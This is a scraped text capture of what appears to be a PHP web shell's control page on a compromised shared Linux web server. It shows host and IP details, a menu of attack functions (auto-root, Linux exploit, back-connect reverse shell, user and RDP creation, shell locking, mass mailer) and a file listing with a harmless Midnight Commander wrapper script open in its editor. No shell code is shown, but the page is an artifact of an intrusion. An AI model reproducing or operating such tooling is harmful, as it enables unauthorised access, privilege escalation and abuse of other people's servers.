Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
mc /
[ HOME SHELL ]
Name
Size
Permission
Action
ext.d
[ DIR ]
drwxr-xr-x
extfs.d
[ DIR ]
drwxr-xr-x
fish
[ DIR ]
drwxr-xr-x
cons.saver
14.3
KB
-rwxr-sr-x
mc-wrapper.csh
402
B
-rwxr-xr-x
mc-wrapper.sh
334
B
-rwxr-xr-x
mc.csh
45
B
-rwxr-xr-x
mc.sh
149
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mc-wrapper.sh
MC_USER=`whoami` MC_PWD_FILE="${TMPDIR-/tmp}/mc-$MC_USER/mc.pwd.$$" /usr/bin/mc -P "$MC_PWD_FILE" "$@" if test -r "$MC_PWD_FILE"; then MC_PWD="`cat "$MC_PWD_FILE"`" if test -n "$MC_PWD" && test "$MC_PWD" != "$PWD" && test -d "$MC_PWD"; then cd "$MC_PWD" fi unset MC_PWD fi rm -f "$MC_PWD_FILE" unset MC_PWD_FILE unset MC_USER
Close